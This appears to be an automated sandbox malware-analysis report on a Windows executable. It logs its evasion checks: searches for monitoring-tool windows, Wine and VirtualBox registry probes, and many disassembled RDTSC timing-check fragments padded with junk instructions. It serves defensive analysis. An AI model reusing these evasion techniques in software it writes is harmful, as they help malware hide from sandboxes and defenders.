Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E97E01 second address: E97E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E96CFF second address: E96D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD25C84A626h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FD25C84A626h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E96D14 second address: E96D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E96D18 second address: E96D54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25C84A632h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD25C84A630h 0x0000000e popad 0x0000000f pushad 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 jo 00007FD25C84A626h 0x00000019 pop ecx 0x0000001a jc 00007FD25C84A62Eh 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E96D54 second address: E96D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD25CDB197Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E972F6 second address: E972FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E975DA second address: E975E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9910E second address: E99141 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FD25C84A626h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f js 00007FD25C84A632h 0x00000015 je 00007FD25C84A62Ch 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push ecx 0x00000020 push edi 0x00000021 pushad 0x00000022 popad 0x00000023 pop edi 0x00000024 pop ecx 0x00000025 mov eax, dword ptr [eax] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E99141 second address: E99157 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25CDB1982h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E99157 second address: D23EA1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jno 00007FD25C84A634h 0x00000012 pop eax 0x00000013 mov dword ptr [ebp+122D20C4h], edx 0x00000019 push dword ptr [ebp+122D15CDh] 0x0000001f mov dh, cl 0x00000021 call dword ptr [ebp+122D30DDh] 0x00000027 pushad 0x00000028 jng 00007FD25C84A632h 0x0000002e jmp 00007FD25C84A638h 0x00000033 xor eax, eax 0x00000035 or dword ptr [ebp+122D20C4h], edi 0x0000003b xor dword ptr [ebp+122D1E5Eh], ebx 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 mov dword ptr [ebp+122D20C4h], edx 0x0000004b mov dword ptr [ebp+122D3BDBh], eax 0x00000051 stc 0x00000052 mov esi, 0000003Ch 0x00000057 mov dword ptr [ebp+122D1E5Eh], esi 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 jno 00007FD25C84A632h 0x00000067 lodsw 0x00000069 xor dword ptr [ebp+122D33BBh], ecx 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 pushad 0x00000074 mov eax, dword ptr [ebp+122D3C23h] 0x0000007a or dword ptr [ebp+122D1E5Eh], eax 0x00000080 popad 0x00000081 mov ebx, dword ptr [esp+24h] 0x00000085 cmc 0x00000086 jo 00007FD25C84A633h 0x0000008c pushad 0x0000008d mov ecx, dword ptr [ebp+122D3ADBh] 0x00000093 mov esi, 53B949E8h 0x00000098 popad 0x00000099 push eax 0x0000009a pushad 0x0000009b jmp 00007FD25C84A636h 0x000000a0 push eax 0x000000a1 push edx 0x000000a2 jmp 00007FD25C84A638h 0x000000a7 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E991DD second address: E991E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E991E3 second address: E991E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E991E7 second address: E991F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E991F4 second address: E99211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD25C84A631h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E99211 second address: E99217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E99217 second address: E9921B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9921B second address: E9923D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FD25CDB197Bh 0x00000011 jng 00007FD25CDB1976h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9923D second address: E992F5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 call 00007FD25C84A633h 0x00000017 sbb di, B3E7h 0x0000001c pop edi 0x0000001d push 00000003h 0x0000001f add edi, 602789B2h 0x00000025 push 00000000h 0x00000027 push edx 0x00000028 jc 00007FD25C84A62Ch 0x0000002e add ecx, 58590D53h 0x00000034 pop esi 0x00000035 push 00000003h 0x00000037 mov edi, dword ptr [ebp+122D3C6Fh] 0x0000003d push 8AB4A41Fh 0x00000042 jnc 00007FD25C84A636h 0x00000048 xor dword ptr [esp], 4AB4A41Fh 0x0000004f lea ebx, dword ptr [ebp+1244905Bh] 0x00000055 push 00000000h 0x00000057 push edi 0x00000058 call 00007FD25C84A628h 0x0000005d pop edi 0x0000005e mov dword ptr [esp+04h], edi 0x00000062 add dword ptr [esp+04h], 0000001Ch 0x0000006a inc edi 0x0000006b push edi 0x0000006c ret 0x0000006d pop edi 0x0000006e ret 0x0000006f mov dword ptr [ebp+122D2240h], edx 0x00000075 push eax 0x00000076 jbe 00007FD25C84A640h 0x0000007c push eax 0x0000007d push edx 0x0000007e jmp 00007FD25C84A632h 0x00000083 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E99366 second address: E9938E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25CDB1980h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov si, D9F2h 0x0000000e push 00000000h 0x00000010 movzx edx, di 0x00000013 push 6EE09BF3h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9938E second address: E99438 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FD25C84A636h 0x0000000c popad 0x0000000d xor dword ptr [esp], 6EE09B73h 0x00000014 mov esi, dword ptr [ebp+122D3B0Bh] 0x0000001a push 00000003h 0x0000001c xor dword ptr [ebp+122D2663h], eax 0x00000022 push 00000000h 0x00000024 mov edx, dword ptr [ebp+122D1E21h] 0x0000002a push 00000003h 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007FD25C84A628h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 0000001Dh 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 jmp 00007FD25C84A631h 0x0000004b push AE3B1102h 0x00000050 jmp 00007FD25C84A62Bh 0x00000055 add dword ptr [esp], 11C4EEFEh 0x0000005c mov cl, dh 0x0000005e lea ebx, dword ptr [ebp+12449064h] 0x00000064 mov ch, 3Ah 0x00000066 xchg eax, ebx 0x00000067 pushad 0x00000068 push edx 0x00000069 jmp 00007FD25C84A62Fh 0x0000006e pop edx 0x0000006f push eax 0x00000070 push edx 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E99438 second address: E9943C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9943C second address: E9945E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25C84A638h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E994AA second address: E9955D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jng 00007FD25CDB1978h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007FD25CDB197Ch 0x00000016 push edi 0x00000017 pop edi 0x00000018 popad 0x00000019 popad 0x0000001a nop 0x0000001b mov ecx, dword ptr [ebp+122D1E6Eh] 0x00000021 push 00000000h 0x00000023 push 29DE0631h 0x00000028 js 00007FD25CDB1989h 0x0000002e jmp 00007FD25CDB1983h 0x00000033 xor dword ptr [esp], 29DE06B1h 0x0000003a mov dword ptr [ebp+122D1F5Eh], ecx 0x00000040 push 00000003h 0x00000042 jbe 00007FD25CDB1979h 0x00000048 movzx esi, cx 0x0000004b push 00000000h 0x0000004d push 00000000h 0x0000004f push ecx 0x00000050 call 00007FD25CDB1978h 0x00000055 pop ecx 0x00000056 mov dword ptr [esp+04h], ecx 0x0000005a add dword ptr [esp+04h], 0000001Ch 0x00000062 inc ecx 0x00000063 push ecx 0x00000064 ret 0x00000065 pop ecx 0x00000066 ret 0x00000067 mov dword ptr [ebp+122D384Fh], edx 0x0000006d xor dword ptr [ebp+122D1F5Eh], edx 0x00000073 push 00000003h 0x00000075 and esi, dword ptr [ebp+122D3D2Bh] 0x0000007b push A80BF309h 0x00000080 push eax 0x00000081 push edx 0x00000082 push eax 0x00000083 push edx 0x00000084 jmp 00007FD25CDB1980h 0x00000089 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9955D second address: E99563 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E99563 second address: E995B4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD25CDB1989h 0x00000008 jmp 00007FD25CDB1983h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xor dword ptr [esp], 680BF309h 0x00000016 sub dword ptr [ebp+122D1D4Ah], esi 0x0000001c lea ebx, dword ptr [ebp+1244906Fh] 0x00000022 or esi, 793B6413h 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FD25CDB1986h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E995B4 second address: E995B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E995B8 second address: E995BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBA263 second address: EBA26B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB81FB second address: EB81FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB81FF second address: EB8215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD25C84A626h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jg 00007FD25C84A626h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB85DF second address: EB85E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB85E4 second address: EB85EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB85EE second address: EB860B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD25CDB197Dh 0x0000000f jg 00007FD25CDB1976h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB860B second address: EB860F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB860F second address: EB8632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD25CDB1989h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB8632 second address: EB8645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD25C84A62Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E91B03 second address: E91B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9B43 second address: EB9B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9B49 second address: EB9B6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FD25CDB1976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d ja 00007FD25CDB1976h 0x00000013 pushad 0x00000014 popad 0x00000015 pop ebx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jbe 00007FD25CDB1976h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9B6A second address: EB9B9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25C84A62Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FD25C84A63Ch 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9B9D second address: EB9BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9BA1 second address: EB9BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBFB5E second address: EBFB80 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD25CDB197Ah 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD25CDB197Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBFB80 second address: EBFBA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD25C84A633h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBFBA4 second address: EBFBB7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD25CDB1976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBFBB7 second address: EBFBC1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD25C84A626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBFBC1 second address: EBFBD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD25CDB1980h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC0F4B second address: EC0F92 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD25C84A64Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD25C84A636h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC5CE9 second address: EC5D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD25CDB1984h 0x00000009 pushad 0x0000000a ja 00007FD25CDB197Ch 0x00000010 jng 00007FD25CDB1976h 0x00000016 push eax 0x00000017 push edx 0x00000018 jnc 00007FD25CDB1976h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC626E second address: EC627A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC627A second address: EC6285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD25CDB1976h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6285 second address: EC628A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC628A second address: EC6299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jnl 00007FD25CDB1976h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6299 second address: EC629D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6438 second address: EC643C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC7CD1 second address: EC7CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD25C84A62Ch 0x0000000a ja 00007FD25C84A626h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC7CE8 second address: EC7CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC7CEC second address: EC7D00 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD25C84A626h 0x00000008 jmp 00007FD25C84A62Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC7D00 second address: EC7D06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECAAA3 second address: ECAAA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECAAA7 second address: ECAB1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD25CDB1987h 0x0000000c jmp 00007FD25CDB197Dh 0x00000011 jmp 00007FD25CDB1987h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FD25CDB1988h 0x0000001e jmp 00007FD25CDB1987h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECAB1B second address: ECAB1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECB2F9 second address: ECB2FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECB664 second address: ECB668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECB668 second address: ECB66C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECB7DE second address: ECB800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FD25C84A636h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECB800 second address: ECB804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECBD99 second address: ECBD9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECBD9D second address: ECBDA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECBE65 second address: ECBE7B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD25C84A62Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECBE7B second address: ECBE80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECC194 second address: ECC198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECC198 second address: ECC19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECC19E second address: ECC1A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECC2D3 second address: ECC2D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECC2D7 second address: ECC2EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FD25C84A628h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECC803 second address: ECC830 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD25CDB1978h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jng 00007FD25CDB1996h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD25CDB1988h 0x00000018 rdtsc
